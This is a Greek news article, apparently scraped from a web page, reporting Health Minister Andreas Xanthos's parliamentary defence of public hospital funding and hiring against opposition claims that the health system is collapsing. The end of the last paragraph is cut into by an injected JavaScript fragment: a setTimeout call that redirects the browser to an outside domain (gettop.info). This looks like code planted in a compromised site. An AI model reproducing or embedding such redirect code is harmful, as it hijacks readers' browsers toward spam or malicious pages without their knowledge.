Ξανθός: Δεν θα αφήσουμε κανέναν πολίτη ακάλυπτο από φάρμακα

0
10

 

                 «Δεν θα αφήσουμε κανέναν άνθρωπο και κανέναν πολίτη αυτής της χώρας που έχει ανάγκη από φάρμακα ακάλυπτο και θα διασφαλίσουμε με νύχια και με δόντια τα δημόσια νοσοκομεία, ώστε να συνεχίσουν να προσφέρουν αξιοπρεπή φροντίδα σε όλο τον κόσμο, ασφαλισμένους, ανασφάλιστους, πρόσφυγες και μετανάστες», τόνισε από το βήμα της Βουλής ο υπουργός Υγείας Ανδρέας Ξανθός απαντώντας σε επερώτηση που κατέθεσε η Δημοκρατική Συμπαράταξη σχετικά με την κατάρρευση του συστήματος Υγείας.

Απαντώντας ιδιαιτέρως στην πρόεδρο κυρία Γεννηματά, που μίλησε για εποχές προ της ιδρύσεως του ΕΣΥ, είπε χαρακτηριστικά πως αδικεί με αυτή την κριτική και την νοημοσύνη του κόσμου και όσων κυβέρνησαν, και χαρακτήρισε «αυτοεκπληρούμενη προφητεία» τα όσα από πέρσι λέγονται ότι «καταρρέει το σύστημα υγείας».

«Μετά, λοιπόν, από ενάμιση χρόνο και οι πέτρες έχουν μάθει ότι αυτό δεν έχει συμβεί. Δεν συνέβη την πιο κρίσιμη περίοδο, επειδή η κυβέρνηση πήρε μια πολύ κρίσιμη πολιτική απόφαση να ενισχύσει τη χρηματοδότησή του και να ανακόψει τη συνεχή, επί πενταετία, περικοπή των προϋπολογισμών των νοσοκομείων». Διαψεύδοντας τα στοιχεία που καταγράφει η επερώτηση ότι 150 εκατ.., δεν απορροφήθηκαν από τα νοσοκομεία και επέστρεψαν στην ΤτΕ, αφού η εκταμίευσή τους έγινε λίγες ημέρες πριν κλείσει το έτος 2015, είπε ότι «τα χρήματα απορροφήθηκαν, έτσι κρατήθηκαν όρθια τα νοσοκομεία, διασφαλίστηκε ο εφοδιασμός τους με φάρμακα και υγειονομικό υλικό μέχρι το τέλος του χρόνου και αναγκαστήκαμε να δώσουμε και μια συμπληρωτική επιχορήγηση τον Δεκέμβρη, για να μπορέσει να βγει το σύστημα υγείας όρθιο».

Επιπλέον, ο κ. Ξανθός αμφισβήτησε τα όσα είπε η κυρία Γεννηματά σχετικά με τις προσλήψεις στον χώρο υγείας, αναφέροντας ότι το 2015, που ήταν η δύσκολη χρονιά, ήταν 187 διασώστες του ΕΚΑΒ, 480 επικουρικοί γιατροί – ενώ τώρα είναι πάνω από 1.200 – παρατάθηκε η σύμβαση 1.100 γιατρών και υπόλοιπου επικουρικού προσωπικού που υπηρετούσε μέχρι τον Σεπτέμβριο του 2017 και παρατείνονται επίσης, κατά τέσσερα εξάμηνα, οι συμβάσεις των ειδικευομένων στα δημόσια νοσοκομεία.

Για το 2016, διορίστηκαν 588 εργαζόμενοι και αυτές τις μέρες, ολοκληρώνεται ο διορισμός των πρώτων, από το 2010, μόνιμων εργαζομένων. Όπως ενημέρωσε, αρχίζει η διαδικασία της κρίσης στα Συμβούλια Επιλογής των πρώτων 760 γιατρών, ενώ έχουν διοριστεί πάνω από 50 γιατροί και πάνω από 200 νοσηλευτές στις ΜΕΘ.

Ακόμη, ο κ. Ξανθός είπε ότι ξεπάγωσαν οι διαδικασίες των προκηρύξεων του 2008, του 2009, του 2010 και ήδη έχουν διοριστεί πάνω από 200 μόνιμοι γιατροί του ΕΣΥ, των οποίων η πρόσληψη εκκρεμούσε μία εξαετία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here